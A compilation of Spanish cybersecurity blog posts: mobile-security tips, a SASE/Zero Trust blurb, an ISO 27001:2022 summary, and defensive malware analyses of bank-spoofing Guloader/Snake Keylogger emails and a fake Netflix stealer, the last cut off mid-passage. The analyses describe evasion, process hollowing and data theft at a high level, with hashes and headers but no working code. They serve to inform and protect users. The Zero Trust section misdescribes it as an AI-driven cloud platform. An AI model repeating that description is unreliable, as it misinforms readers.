seguridad de su dispositivo móvil y evitar que los atacantes accedan a él. 7. Mantenga su dispositivo móvil y su software actualizados. Las actualizaciones a menudo incluyen parches de seguridad y soluciones de problemas que pueden proteger contra vulnerabilidades y amenazas cibernéticas. 8. Sea cauteloso al proporcionar información personal o financiera a través de su dispositivo móvil. Si recibe un mensaje de texto o mensaje instantáneo solicitando información personal o financiera, verifique la veracidad del mensaje antes de proporcionar la información. 9. Configure alertas de seguridad en su cuenta bancaria o de tarjeta de crédito. Muchas instituciones financieras ofrecen alertas de seguridad que le avisan cuando se realizan transacciones o se hacen cambios en su cuenta. 10. Utilice una red privada virtual (VPN) al conectarse a redes Wi-Fi públicas. Las VPN pueden proteger la información que envía y recibe a través de una red Wi-Fi pública y evitar que los atacantes accedan a ella. 11. Configure su dispositivo móvil para bloquear el acceso a aplicaciones y servicios de terceros no confiables. Esto puede ayudar a evitar que se descargue malware o software malintencionado en su dispositivo móvil. 12. Haga copias de seguridad de su información importante de manera regular. Si su dispositivo móvil es objeto de un ataque cibernético o sufre daños, las copias de seguridad le permitirán recuperar su información importante. ## ¿ Por que están de moda SASE y Zero Trust para el próximo 2023 ? SASE (Secure Access Service Edge) es una arquitectura de red que combina la seguridad de la red y la accesibilidad en un servicio en la nube. SASE se está volviendo popular debido a la necesidad de brindar acceso seguro a recursos en la nube y a aplicaciones en distintos lugares. SASE se basa en la nube y utiliza tecnologías como VPN y firewalls para brindar seguridad a la red y al acceso a aplicaciones. Zero Trust es una plataforma de seguridad basada en la nube que ofrece protección contra amenazas cibernéticas y gestión de riesgos. Zero Trust se está volviendo popular debido a la necesidad de proteger la información en la nube y a la gestión de riesgos en entornos cambiantes. Zero Trust utiliza técnicas de inteligencia artificial y aprendizaje automático para identificar y proteger contra amenazas cibernéticas en tiempo real. --- # Malware Guloader utilizado en correos que suplantan a BBVA y Grupo Santander URL: https://ciberseguridad.blog/malware-guloader-utilizado-en-correos-que-suplantan-a-bbva-y-grupo-santander/ Tipo: Artículo Autor: Rafa.Pedrero Publicado: 2022-11-20 Actualizado: 2026-10-04 Tema: Herramientas para hackear > Como resumen, podemos decir que nunca abráis un ejecutable procedente de un correo de un banco (el que sea), ellos no envían nunca estas cosas. Hola a tod@s! Me he encontrado con un par de email en Any.run en el que podemos ver como cierta familia de malware, concretamente Guloader (para protegerse de ciertos entornos), es utilizado en los mismos, además de palabras comunes y adjuntos similares. Pretenden hacer pensar a los usuarios que tienen que abrir un fichero comprimido con un ejecutable en su interior (donde se guarda el malware), ya sea para leer un aviso de pago, confirmar un contrato, etc. Bien, pues vamos a tratar de ver con información disponible en las diferentes sandboxes de qué se trata y si esconden algo más (vendrá al final del post ;-D). Podemos verlo en los siguientes enlaces: [ GRUPO SANTANDER ] Confirming - Aviso de pago (315 KB).msg (MD5: B82866EA1F8C54736E7D44F3FCE51454). [Imagen: Malware Bancario Banco Santander] [ BBVA ] BBVA-Confirming Contrato de Cesin de Crditos Sin Recurso (328 KB).msg (MD5: A1A0D9DDB4B30494A7D637A29D02835C). [Imagen: Malware Bancario BBVA] Podemos ver como afecta al banco BBVA y Grupo Santander o viceversa, según vemos en los correos en la siguiente captura. Que parezcan que proceden de direcciones de correos pertenecientes a los bancos, no quiere decir que sean legítimos, ni mucho menos, los atacantes utilizan servidores en los que se permite falsear el origen, así que no te fíes de todo lo que te llega. > Los bancos nunca te van a enviar un correo con un ejecutable como adjunto. [Imagen: Email correo Malware Bancario] Si nos fijamos en las cabeceras, vemos como los correos proceden del mismo sitio: ``` Provider from webmail.telardecoracion.com (localhost [IPv6:::1]) by setentaynueve64.nsprimario.com (Postfix) with ESMTPSA id 56C96103BDA; Thu, 10 Nov 2022 08:49:24 +0100 (CET) ``` Concretamente desde webmail.telardecoracion.com y los ficheros adjuntos también coinciden (el contenido del zip): ``` $ md5sum “Contrato de Cesin de Crditos Sin Recurso.exe” 205822358-042601-sanlccjavap0004-4872.exe a8406cd318ad09b65a6785ef149c89bc Contrato de Cesin de Crditos Sin Recurso.exe a8406cd318ad09b65a6785ef149c89bc 205822358-042601-sanlccjavap0004-4872.exe ``` Así que vamos a de qué se trata más detenidamente, utilizan un instalador conocido como NSIS. [Imagen: NSIS program] Podemos utilizar varias herramientas para identificar el script utilizado por la muestra. Con ciertas versiones antiguas de 7zip podemos acceder a su contenido y poder leerlo con un editor de texto: [Imagen: NSIS] Ese fichero [NSIS].nsi contiene el script que se ejecutará, y tiene esta pinta: [Imagen: Script NSIS] Estos scripts, a veces, son como una madeja interminable, tienes que ir a ver qué hace una función, que llama a otra y a otra y a otra y a otra… y a otras más. Dentro del binario se encuentra una dll, parte del instalador NSIS, que seguro habéis visto muchas veces, llamada System.dll, encargada de ejecutar tanto binarios como shellcodes. [Imagen: System.dll] Se hace referencia a ella desde el script de esta forma: [Imagen: Llamada Systemdll desde NSIS] Y después hay una serie de directorios en donde se puede encontrar tanto software legítimo (añadido a posta para que no se sospeche) como el malware, cifrado o sin cifrar. [Imagen: Funciones NSIS] Any.run no nos dice de qué se trata, en caso de detectarlo lo añade al botón de Malconf si es que obtiene la configuración, o bien lo marca en el propio proceso: [Imagen: Malconf AnyRun] En este caso no lo podremos obtener aquí. Buscamos el hash del binario en otras sandboxes. En Tria.ge parece que subieron el mismo correo, el del BBVA: [Imagen: Malware BBVA Triage] Aunque lo detecta como malicioso, tampoco es capaz de identificar de qué se trata. [Imagen: Detecciones Maleare BBVA Traige] Buscamos el hash en Joe Sandbox y vemos algo curioso: [Imagen: JOE Sandbox Malware Bancario BBVA] Hay un 100/100 en una máquina que nos dice que es física. Por lo tanto, ya sabemos que el malware se protege ante plataformas de este tipo. [Imagen: Malware Guloader Maquina Fisica] Nos dice que es Guloader, ¿pero será fiable esa detección? Las reglas Yara (de las que hemos hablado en otros artículos), suelen ser bastante fiables. [Imagen: Reglas YARA Guloader] Por lo tanto, podemos decir que ha dado en el clavo. Guloader descarga malware si se dan una serie de condiciones, entre otras, que no se esté ejecutando en una sandbox, máquina virtual, que se esté depurando el proceso, etc. Estas detecciones que se ven a continuación son utilizadas por este malware, por lo que coincide en el comportamiento y no solamente en las reglas Yara. [Imagen: Condiciones Guloader] Esta también coincide, trata de medir los tiempos de ejecución de instrucciones, en un entorno donde está siendo depurado se disparará el resultado, sería mucho mayor y sería detectado: [Imagen: Anti Debugging] Estos son sólo unos ejemplos para comprobar si coincide el comportamiento, y en este caso, coincide. Otro es como continúa, inyectándose en otro proceso legítimo utilizando Process Hollowing, en este caso en CasPol.exe. [Imagen: Process Hollowing CasPol.exe] Comenzando con la API CreateProcessInternalW como era de esperar en este malware: [Imagen: CreateProcessInternalW] Podemos observar la url que se encuentra en la shellcode de Guloader, perteneciente a drive.google.com: [Imagen: Malware Google Drive] Nos faltaría conocer lo siguiente que descargaría, en ninguno de ellos lo vemos. Hagamos un inciso en este punto y busquemos algún parecido razonable. Teníamos el fichero “NeroCmd.exe.manifest” que en condiciones normales, pertenecería al software Nero, pero no en este caso. Encontramos un fichero muy parecido esta URL. [Imagen: Malware NeroCmd.exe] Tenemos otro fichero (doble extensión), que tiene el mismo comportamiento, el mismo fichero “NeroCmd.exe.manifest”, el mismo icono, url similar, se parece mucho, mucho, en su aspecto, claro. [Imagen: Iconos Parecidos NeroCmd] Si comparamos los ficheros NSIS vemos como son muy parecidos, utilizaron el mismo fichero base y cambiaron algunas cosas. [Imagen: Comparación NSIS] Aunque hay diferencias, no son significativas, pero sí en los ficheros existentes en el interior de los directorios: [Imagen: Cambios en el interior de los directorios] Según la detección de Joe Sandbox, descargó AgentTesla: [Imagen: Reglas Yara detectadas de AgentTesla] Y es capaz de extraer la configuración del malware, ¿será lo mismo?: [Imagen: Malware Configuracion AgentTesla] Pues veremos como NO son lo mismo, pero quería que vieráis como no solamente preparan un único malware, hay muchos parecidos (programados por el mismo grupo) destinados a diferentes objetivos, con cambios mínimos a la hora de empaquetarlos. Volvemos al que nos atañe, al que se recibió de los bancos, vemos una petición a checkip.dyndns.com, esto es diferente al anterior (en donde se veía una dirección perteneciente al servidor de correo donde se exfiltraba la información). Entonces, aunque no se detecte en Joe Sandbox el malware como tal, funcionó y se descargó, ya que esa diferencia relacionada con la consulta de la ip externa pertenece al nuevo malware. Podemos ver las cadenas en memoria: [Imagen: Llamadas en memoria Malware] Abrimos los ficheros y buscamos anomalías o cadenas pertenecientes que nos llamen la atención. [Imagen: Uso de CasPol en TeslaAgent] En este caso en concreto, recordar que se había inyectado en él, tenemos unas cadenas muy sospechosas, así que buscamos ese dominio y aterrizaremos en la zona del malware: [Imagen: CheckIP Malware DynDNS] Bajamos hasta que veamos cadenas que nos suenen y esta, sin duda, nos suena muchísimo y aparece muchas veces. [Imagen: Cadenas Repetidas Malware] Lo hemos encontrado, se trata de Snake Keylogger, es lógico, al tratarse de correos suplantando bancos. Aunque no le haya puesto un nombre, sí que detectaba que se estaban buscando credenciales según la siguiente regla Yara. [Imagen: CredentialStealer Snake Keylogger] De nuevo nos encontramos con Snake Keylogger, ya vimos como está aumentando su actividad en otro post. Como resumen, podemos decir que nunca abráis un ejecutable procedente de un correo de un banco (el que sea), ellos no envían nunca estas cosas. Espero que os haya gustado y nos vemos en el siguiente post!! --- # ISO 27001:2022 - Controles nuevos en el estándar de ciberseguridad por excelencia URL: https://ciberseguridad.blog/iso-27001-2022-controles-nuevos-en-el-estandar-de-ciberseguridad-por-excelencia/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2022-11-13 Actualizado: 2026-10-08 Tema: Compliance > ISO 27001 es la norma internacional para la seguridad de la información por excelencia. Nueva ISO 27001:2022 con más bien, pocos cambios. ISO/IEC 27001 es la norma internacional para la seguridad de la información por excelencia. Se trata de un sistema de gestión de la seguridad de la información (SGSI). Al igual que lo hicimos con el nuevo ENS 2022, hoy venimos con la tan esperada actualización de la norma en ISO/IEC 27001:2022 , sobre la que veremos los principales cambios implementados. Pero debemos empezar con algo en la cabeza: Lo primero que debemos hacer para la nueva versión de la ISO27001 es no asustarnos, ya que ha cambiado más bien poco. ## Listado de cambios en la ISO/IEC 27001:2022 A continuación, intentaremos detallar los cambios en las distintas clausulas surgidas en esta actualización: ## ISO/IEC 27001:2022 - Cláusula 4 : Contexto de la organización - Cláusula 4.1 - Entender la organización y su contexto : Sin cambio - Cláusula 4.2 - Comprender las necesidades y expectativas de las partes interesadas :No hay ningún cambio real en la cláusula 4.2 de ISO 27001 para la actualización de 2022. Se ha aclarado que ahora se determinará cuáles de los requisitos identificados se abordarán a través del sistema de gestión de la seguridad de la información en lugar de implicarlo. - Cláusula 4.3 - Determinación del alcance del sistema de gestión de la seguridad de la información: No hay un gran cambio en la cláusula 4.3 de la ISO 27001 en la actualización de 2022, ya que lo único que hace es eliminar la palabra "y" del 4.3 b. - Cláusula 4.4 - Sistema de gestión de la seguridad de la información: En esta actualización, se refieren a través de la norma a este "documento" en lugar de a esta "norma internacional". Sustituyendo las palabras "norma internacional" por la palabra "documento". Han añadido en la frase el término "incluyendo los procesos necesarios y sus interacciones" para dejar absolutamente claro que los procesos están incluidos, en lugar de darlo a entender. En esencia, no ha cambiado nada. Se trata de una aclaración de la redacción. ## ISO/IEC 27001:2022 - Cláusula 5 : Liderazgo - Cláusula 5.1 - Liderazgo y compromiso : No cambia - Cláusula 5.2 - Política : No cambia - Cláusula 5.3 - Funciones, responsabilidades y autoridades de la organización : Los cambios en la cláusula 5.3 de la ISO 27001 para la actualización de 2022 son, en el mejor de los casos, menores. Se ha cambiado la palabra "norma internacional" por la palabra "documento" y se ha añadido la aclaración de que la comunicación se realiza dentro de la organización, como siempre se ha insinuado pero nunca se había dicho. Un cambio no muy importante. ## ISO/IEC 27001:2022 - Cláusula 6 : Planificación - Cláusula 6.1 - Acciones para abordar los riesgos y las oportunidades : Sin cambios - Cláusula 6.1.1 - Generalidades : La actualización fue para eliminar la palabra "y" de 6.1.1 b. - Cláusula 6.1.2 - Evaluación del riesgo para la seguridad de la información : Sin cambios - Cláusula 6.1.3 Tratamiento de los riesgos para la seguridad de la información : Los cambios en la cláusula 6.1.3 de ISO 27001 son menores pero importantes . Se ha cambiado la redacción de 6.1.3 c para que ahora se haga referencia al Anexo A como una lista de posibles controles de seguridad de la información. Esto es un cambio que contiene una lista completa de objetivos de control. Se ha eliminado las frases que dicen que los objetivos de control están implícitamente incluidos en los controles elegidos. Se ha cambiado que los objetivos de control que figuran en el Anexo A no son exhaustivos, pudiendo ser necesarios controles adicionales, a la redacción de Controles de Seguridad de la Información que figura en el Anexo. Se ha cambiado la palabra objetivos de control por controles. Se ha cambiado la frase de 6.1.3 d por una lista para facilitar la lectura Se ha cambiado la palabra "norma internacional" por la palabra "documento". En general se trata de cambios de aclaración. - Cláusula 6.2 - Objetivos de seguridad de la información y planificación para alcanzarlos : Ha sufrido cambios menores, centrándose los cambios en la claridad. Se introdujo que los objetivos de seguridad de la información deben ser supervisados y estar disponibles como información documentada. Siempre estuvo implícito, pero ahora se hace explícito. Como resultado, la numeración de las subpartes ha cambiado, pero esto no es importante. - Cláusula 6.3 - Planificación de los cambios : Cuando hagas cambios en el SGSI hazlo de forma planificada. Aunque entendiendo que siempre deberían ser planificados, ahora queda reflejado en la actualización 2022. ## ISO/IEC 27001:2022 Clausula 7 : Soporte - Cláusula 7.1 - Recursos : Sin cambios - Cláusula 7.2 - Competencia : Sin cambios - Cláusula 7.3 - Concienciación : Sin cambios - Cláusula 7.4 - Comunicación : Hay cambios menores. Los cambios pueden considerarse una simplificación. Se elimina quién debe comunicar y se sustituye por cómo comunicar y se elimina por completo la necesidad de mostrar los procesos por los que se debe realizar la comunicación. - Cláusula 7.5 - Información documentada : Sin cambios -Cláusula 7.5.1 - Generalidades : Hay una actualización general en toda la norma para sustituir las palabras "Norma Internacional" por la palabra "documento". Pero esto no es material, sino que se refiere a cómo la norma se refiere a sí misma en el texto. -Cláusula 7.5.2 Creación y actualización : Sin cambios -Cláusula 7.5.3 - Control de la información documentada : No hay cambios en la cláusula 7.5.3 de ISO 27001 en la actualización de 2022. Donde se hacía referencia a la "Norma Internacional" en referencia al documento se ha sustituido por la palabra "documento", como venimos comentando. ## ISO/IEC 27001:2022 Clausula 8 : Operación - Cláusula 8.1 - Planificación y control de las operaciones : Son cambios de aclaración y nada importante. La redacción sobre la planificación y la implementación y el control de los procesos se amplía a la redacción más general de "cumplir con los requisitos" en lugar de antes, que era "cumplir con los requisitos de seguridad de la información". Ahora se habla de establecer criterios para los procesos e implementar el control de los procesos en línea con esos criterios. En lugar de mantener la información documentada se cambia a que la información documentada esté disponible. Los procesos subcontratados se "determinan y controlan" se cambia a "se controlan los procesos, productos o servicios proporcionados externamente que son relevantes para el sistema de gestión de la seguridad de la información." - Cláusula 8.2 - Evaluación de los riesgos para la seguridad de la información : Sin Cambios - Cláusula 8.3 - Tratamiento de los riesgos de la seguridad de la información : Sin Cambios ## ISO/IEC 27001:2022 Cláusula 9 : Evaluación del desempeño - Cláusula 9.1 - Seguimiento, medición, análisis y evaluación : Hay cambios de aclaración. Se han eliminado las palabras sobre "la organización evalúa el rendimiento de la seguridad de la información y la eficacia del sistema de gestión". Estando cubiertas en mayor o menor grado en otras partes de la cláusula. -El apartado 9.1 b se ha actualizado para orientar sobre los métodos de seguimiento, medición, análisis y evaluación y establece, que deben producir resultados comparables y reproducibles para ser considerados válidos. Esto era antes una nota a pie de página, por lo que no hay cambios importantes. -En el apartado 9.1 e se ha suprimido la palabra "y" sin apenas consecuencias. -Se ha incluido el requisito de que la información documentada esté disponible para demostrar los resultados, convirtiéndolo en un requisito explícito en lugar de implícito. En lugar de conservar la documentación adecuada como prueba, la línea se ha sustituido por el requisito de evaluar el rendimiento de la seguridad de la información y la eficacia del sistema de gestión de la seguridad de la información. - Cláusula 9.2 - Auditoría interna: Se ha eliminado la redacción de esta cláusula y se ha cambiado la redacción a dos nuevas subcláusulas separadas: -Cláusula 9.2.1 - Generalidades: NUEVA - No dice nada nuevo, sólo separa la antigua cláusula para facilitar la lectura. -Cláusula 9.2.2 - Programa de auditoría interna : NUEVO - no dice nada nuevo, sólo separa la antigua cláusula para facilitar la lectura. - Cláusula 9.3 - Revisión de la gestión: Se ha eliminado la redacción de esta cláusula y se ha cambiado la redacción a tres nuevas subcláusulas separadas. -Cláusula 9.3.1 - Generalidades : NUEVA - no dice nada nuevo, sólo separa la antigua cláusula para facilitar la lectura. -Cláusula 9.3.2 - Aportaciones de la dirección : NUEVA - no dice nada nuevo, sólo separa la antigua cláusula para facilitar la lectura. -Cláusula 9.3.3 - Resultados de la revisión de la gestión : NUEVO - no dice nada nuevo, sólo separa la cláusula anterior para facilitar la lectura. ## ISO/IEC 27001:2022 Cláusula 10 : Mejora - Cláusula 10.1 - Mejora continua : Sin cambios pero con numeración intercambiada - Cláusula 10.2 - No conformidad y acción correctiva : Sin cambios pero con numeración cambiada - Anexo A - Controles de seguridad de la información referencia ISO 27002: 2022 : Nueva versión del conjunto de controles ## Anexo A : Nueva lista de los Controles ISO 27002:2022 No lo hemos visto en un post explícitamente, pero veamos los cambios significativos y nuevos puntos que nos trae la ISO 27002:2022 , alguno de ellos tan relevantes como el teletrabajo. - ISO 27002 - 5 : Controles organizativos ISO 27002 - 5.1 : Políticas de seguridad de la información ISO 27002 - 5.2 : Funciones y responsabilidades en materia de seguridad de la información ISO 27002 - 5.3 : Segregación de funciones ISO 27002 - 5.4 : Responsabilidades de la dirección ISO 27002 - 5.5 : Contacto con las autoridades ISO 27002 - 5.6 : Contacto con grupos de interés especial ISO 27002 - 5.7 : Inteligencia de amenazas - NUEVO ISO 27002 - 5.8 : Seguridad de la información en la gestión de proyectos ISO 27002 - 5.9 : Inventario de la información y otros activos asociados - CAMBIOS ISO 27002 - 5.10 : Uso aceptable de la información y otros activos asociados - CAMBIOS ISO 27002 - 5.11 : Devolución de activos ISO 27002 - 5.12 : Clasificación de la información ISO 27002 - 5.13 : Etiquetado de la información ISO 27002 - 5.14 : Transferencia de información ISO 27002 - 5.15 : Control de acceso ISO 27002 - 5.16 : Gestión de la identidad ISO 27002 - 5.17 : Información de autenticación - NUEVO ISO 27002 - 5.18 : Derechos de acceso - CAMBIOS ISO 27002 - 5.19 : Seguridad de la información en las relaciones con los proveedores ISO 27002 - 5.20 : Gestión de la seguridad de la información en los acuerdos con los proveedores ISO 27002 - 5.21 : Gestión de la seguridad de la información en la cadena de suministro de las TIC - NUEVO ISO 27002 - 5.22 : Monitoreo, revisión y gestión de cambios de los servicios de los proveedores - CAMBIOS ISO 27002 - 5.23 : Seguridad de la información para el uso de servicios en la nube - NUEVO ISO 27002 - 5.24 : Planificación y preparación de la gestión de incidentes de seguridad de la información - CAMBIOS ISO 27002 - 5.25 : Evaluación y decisión sobre eventos de seguridad de la información ISO 27002 - 5.26 : Respuesta a incidentes de seguridad de la información ISO 27002 - 5.27 : Aprendizaje de los incidentes de seguridad de la información ISO 27002 - 5.28 : Recogida de pruebas ISO 27002 - 5.29 : Seguridad de la información durante la interrupción - CAMBIOS ISO 27002 - 5.30 : Preparación de las TIC para la continuidad del negocio - NUEVO ISO 27002 - 5.31 : Identificación de los requisitos legales, reglamentarios y contractuales ISO 27002 - 5.32 : Derechos de propiedad intelectual ISO 27002 - 5.33 : Protección de registros ISO 27002 - 5.34 : Privacidad y protección de la información personal ISO 27002 - 5.35 : Revisión independiente de la seguridad de la información ISO 27002 - 5.36 : Cumplimiento de políticas y normas de seguridad de la información ISO 27002 - 5.37 : Procedimientos operativos documentados - ISO 27002 - 6 : Controles de personas ISO 27002 - 6.1 : Selección de personal ISO 27002 - 6.2 : Términos y condiciones de empleo ISO 27002 - 6.3 : Concienciación, educación y formación en materia de seguridad de la información ISO 27002 - 6.4 : Proceso disciplinario ISO 27002 - 6.5 : Responsabilidades después de la terminación o cambio de empleo ISO 27002 - 6.6 : Acuerdos de confidencialidad o no divulgación ISO 27002 - 6.7 : Trabajo a distancia - NUEVO ISO 27002 - 6.8 : Reporte de eventos de seguridad de la información - ISO 27002 - 7 : Controles físicos ISO 27002 - 7.1 : Perímetro de seguridad física ISO 27002 - 7.2 : Controles físicos de entrada ISO 27002 - 7.3 : Seguridad de oficinas, salas e instalaciones ISO 27002 - 7.4 : Supervisión de la seguridad física ISO 27002 - 7.5 : Protección contra amenazas físicas y ambientales ISO 27002 - 7.6 : Trabajar en áreas seguras ISO 27002 - 7.7 : Escritorio y pantalla despejados ISO 27002 - 7.8 : Ubicación y protección de los equipos ISO 27002 - 7.9 : Seguridad de los activos fuera de las instalaciones ISO 27002 - 7.10 : Medios de almacenamiento - NUEVO ISO 27002 - 7.11 : Servicios de apoyo ISO 27002 - 7.12 : Seguridad del cableado ISO 27002 - 7.13 : Mantenimiento de equipos ISO 27002 - 7.14 : Seguridad en la eliminación o reutilización de equipos - ISO 27002 - 8 : Controles tecnológicos ISO 27002 - 8.1 : Dispositivos de punto final del usuario - NUEVO ISO 27002 - 8.2 : Derechos de acceso con privilegios ISO 27002 - 8.3 : Restricción de acceso a la información ISO 27002 - 8.4 : Acceso al código fuente ISO 27002 - 8.5 : Autenticación segura ISO 27002 - 8.6 : Gestión de la capacidad ISO 27002 - 8.7 : Protección contra el malware ISO 27002 - 8.8 : Gestión de las vulnerabilidades técnicas ISO 27002 - 8.9 : Gestión de la configuración ISO 27002 - 8.10 : Eliminación de información - NUEVO ISO 27002 - 8.11 : Enmascaramiento de datos - NUEVO ISO 27002 - 8.12 : Prevención de la fuga de datos - NUEVO ISO 27002 - 8.13 : Copia de seguridad de la información ISO 27002 - 8.14 : Redundancia de las instalaciones de procesamiento de la información ISO 27002 - 8.15 : Registro de datos ISO 27002 - 8.16 : Actividades de supervisión ISO 27002 - 8.17 : Sincronización de relojes ISO 27002 - 8.18 : Uso de programas de utilidad privilegiados ISO 27002 - 8.19 : Instalación de software en sistemas operativos ISO 27002 - 8.20 : Controles de red ISO 27002 - 8.21 : Seguridad de los servicios de red ISO 27002 - 8.22 : Filtrado web - NUEVO ISO 27002 - 8.23 : Segregación en redes ISO 27002 - 8.24 : Uso de criptografía ISO 27002 - 8.25 : Ciclo de vida de desarrollo seguro ISO 27002 - 8.26 : Requisitos de seguridad de las aplicaciones - NUEVO ISO 27002 - 8.27 : Arquitectura de sistemas seguros y principios de ingeniería - NUEVO ISO 27002 - 8.28 : Codificación segura ISO 27002 - 8.29 : Pruebas de seguridad en el desarrollo y la aceptación ISO 27002 - 8.30 : Desarrollo externalizado ISO 27002 - 8.31 : Separación de los entornos de desarrollo, prueba y producción ISO 27002 - 8.32 : Gestión del cambio ISO 27002 - 8.33 : Información de pruebas ISO 27002 - 8.34 : Protección de los sistemas de información durante la auditoría y las pruebas - NUEVO ## Principales errores a la hora de abordar la nueva norma ISO27001 1. Asumir que es diferente : Asumir que es muy diferente y entrar en pánico. Preocupar a la organización indebidamente y buscar un presupuesto amplio para algo que fundamentalmente no es diferente a lo que ya se tiene o en lo que ya se está trabajando. 2. Pagar a consultores para que calculen el impacto : Pagar a consultores para que nos digan que no ha cambiado fundamentalmente nada cuando puedes comprar la norma tú mismo, leerla y llegar a esa conclusión en unos 15 minutos. O fiarte algo de mi 😀. 3. No comprar ni leer la norma: Confiar en Internet y en los recursos gratuitos en lugar de conseguir una copia de la norma y leerla por sí mismo. Aunque te fíes algo de mi, es imprescindible que tengas la misma siempre a mano Al igual que paso cuando salió la ISO27001:2022 y sobre la que podríamos dar varios tips: 1. Fundamentalmente, no ha cambiado nada : La ISO27001:2022 es fundamentalmente la misma con pequeños cambios de redacción, un cambio de numeración en 2 controles y algunas aclaraciones. 2. El cambio más importante es el de la norma ISO27002/Anexo A ( Que indicamos más arriba ) . El mayor cambio ya se produjo con el conjunto de controles cuando se actualizó la ISO27002 a la versión 2022. 3. Se trata de una alineación de versiones : Como la norma no ha cambiado significativamente desde la versión de 2013, ya que el enfoque parece ser nombrar la norma seguida de un año, es un poco embarazoso que la gente esté trabajando con lo que parece ser una versión de 2013 de una norma de seguridad de la información, por lo que para hacerlo más relevante han cambiado el nombre a 2022. 😁 ### ¿Cómo afecta esto a las organizaciones que están aplicando la norma ISO 27001 actualmente? Es poco probable que los organismos de certificación ofrezcan la certificación de la norma ISO 27001:2022 hasta al menos seis meses después de la publicación de la norma ( hablamos aproximadamente de Abril 2023 ) , y la norma ISO 27001:2013 no se retirará hasta dentro de tres años ( Octubre 2025 ), por lo que no hay que preocuparse de que cualquier trabajo que hayamos realizado para implantar la norma ISO 27001:2013 se vea desperdiciado. Dependiendo de lo que hayamos avanzado nuestro proyecto de implementación de ISO 27001:2013, es posible que deseemos utilizar los nuevos controles del Anexo A de ISO 27001:2022 como un conjunto de control alternativo, aunque todavía tendremos que compararlos con los controles del Anexo A de 2013 en nuestra declaración de aplicabilidad. Antes de renovar nuestra certificación ISO 27001 después de tres años, deberemos realizar la transición de nuestro SGSI para cumplir con la iteración 2022 de la Norma. Hay un período de transición de tres años para que las organizaciones certificadas revisen su sistema de gestión para ajustarse a la nueva versión de la norma ISO 27001, por lo que hay tiempo suficiente para realizar los cambios necesarios. Sin embargo, algunos organismos de certificación podrían dejar de ofrecer la certificación para la iteración de 2013 de la norma antes de ese momento, por lo que vale la pena comprobar si necesitamos hacer la transición antes. No es aconsejable dejar para el último momento el cumplimiento de las nuevas obligaciones, por lo que si tenemos que renovar nuestra certificación durante el periodo de transición, podríamos trabajar ya contra el nuevo conjunto de controles. Una de las ventajas de implantar los nuevos controles es que, al ser identificables por atributos, es más fácil centrar nuestras selecciones, lo que podría reducir la carga de cumplimiento o ayudarnos a ver cómo integrar mejor nuestros procesos de seguridad, facilitando así la implantación y gestión del SGSI. Conclusiones cobre la ISO 27001:2022 Ya lo hemos visto a lo largo del post, pero si tuviese que sacar una conclusión clara de la nueva norma, es que la misma no ha cambiado lo suficiente para alarmarnos con la misma. Como hemos venido hablando, muchos de los cambios, son cambios menores, así como muchos cambios de redacción y aclaratorios, haciendo cambios explícitos en alguno de los casos, lo que nos facilita la labor al no dejarnos duda. Ya tenemos todas nuestras "armas" actualizadas, tanto la ISO 27001:2022 como la ISO 27002:2022 y Anexos, así que ahora , ya solo es cuestión de ponernos y certificar nuestros sistemas. Intentare traeros un posts en la que juntemos ENS e ISO 27002 , donde convergen muchos puntos, y en el que talvez, nos sea de ayuda, ya que nos vamos a certificar en uno de ellos, lanzarnos a por el otro. --- # Netflix no regala suscripciones URL: https://ciberseguridad.blog/netflix-no-regala-suscripciones/ Tipo: Artículo Autor: Rafa.Pedrero Publicado: 2022-10-09 Actualizado: 2026-10-04 Tema: Herramientas para hackear > Intentar ahorrarnos algo de dinero, nos suele salir más caro. Descubre como por "Netflix" te vaciarán el banco o te quedaras sin Facebook. Hola a tod@s! Muchas veces nos da por buscar si alguna plataforma de pago ofrece servicios gratuitos. Esto tiene un peligro y es que puedes encontrar aplicaciones como esta. [Imagen: Netflix free Player] En Any.run : Netflix Free Player v.1.26.zip Un visor gratuito para ver Netflix ¿Nos lo creemos? Más bien, ¡¡no!! [Imagen: Visor Netflix Any.run] En any.run no vemos alguna captura que nos dé pistas de lo que es. En el árbol de procesos vemos varias cosas interesantes. Vemos como el nombre del fichero original cambia a otro, 88823579716059164150.exe y justo después se produce una detección del proceso así como un borrado del fichero original. [Imagen: Borrado fichero original Netflix] Además de la creación de una tarea, ésta apunta hacia otro fichero de reciente creación. [Imagen: Creación de fichero Malware] Para aparecer, finalmente, en el árbol de procesos (creando la misma tarea que el anterior). [Imagen: Creación Arbol de procesos Malware Netflix] Podíamos ver como Any.run lo había catalogado como stealer en la primera captura que os mostré, ¿Por qué? Para dar realismo al Malware le han puesto el icono de Netflix. [Imagen: Icono de Netflix con Malware - Stealer] Abrimos nuestro editor de recursos favorito y lo vemos ahí mismo. [Imagen: Editor de recursos Hackers] Sin embargo, algo que nos llama inmediatamente la atención es el VERSION_INFO: [Imagen: VERSION_INFO Malware Stealer Netflix] ¿ ProductName WinAce ? WinAce es una utilidad de des/compresión de ficheros, nada que ver con este binario. Es muy sencillo abrir WinAce con un editor de recursos, copiar el VERSION_INFO y pegarlo en otro, el resultado será similar a lo que estáis viendo. Otra cosa que nos llama la atención es el tamaño del fichero exe, 339 MB. Un tamaño muy grande, como hemos visto en otras ocasiones, tratan de evitar que se suba a alguna sandbox online en la cuál está limitado el tamaño de los ficheros. En formato zip también se puede subir (como en esta ocasión) y el tamaño es mucho menor. [Imagen: Malware pesado Netflix] Además, esté empaquetado con MPRESS, “parecido” a UPX. [Imagen: Malware empaquetado MPRESS en Netflix] Lo que pretenden es que las cadenas del binario o el mismo comportamiento no esté directamente accesible, hay que desempaquetarlo para ver qué hace realmente. La posible fecha de compilación (se puede alterar fácilmente) es muy reciente. [Imagen: Fecha de compilación del malware de Netflix] Qué más nos ofrece Any.run y que podamos usar para identificar la familia que hay detrás de este stealer. [Imagen: Peticiones a IPs del Malware de Netflix] La primera petición que se ve contra esa IP vemos como envía ciertos parámetros que se ha encontrado en la máquina afectada. [Imagen: Envio de parámetros de maquina infectada con Malware] Vemos lo que parece un hash, directorios y extensiones separados por comas y puntos y comas. En la segunda, se ve como se ha enviado un fichero (¿el zip que se ve en la URL? sí) por POST: [Imagen: Envio de información del malware en el visor de Netflix] Como está codificado en base64 utilizamos Cyberchef y obtendremos el zip que se ha tratado de enviar hacia esa IP: [Imagen: DataLeak Malware Netflix] Aquí tenemos su contenido: [Imagen: Información filtrada por el malware de Netflix en el archivo comprimido que manda] Sin duda, parece un stealer, ha recopilado información sobre el equipo (histórico de navegación, cookies, ficheros, contraseñas de los navegadores y una captura del escritorio). [Imagen: Captura de un escritorio Windows con el archivo comprimido NetflixFreePlayer v1.20.zip abierto en WinRAR] La información que envía es sobre el equipo, Sistema Operativo, hardware, 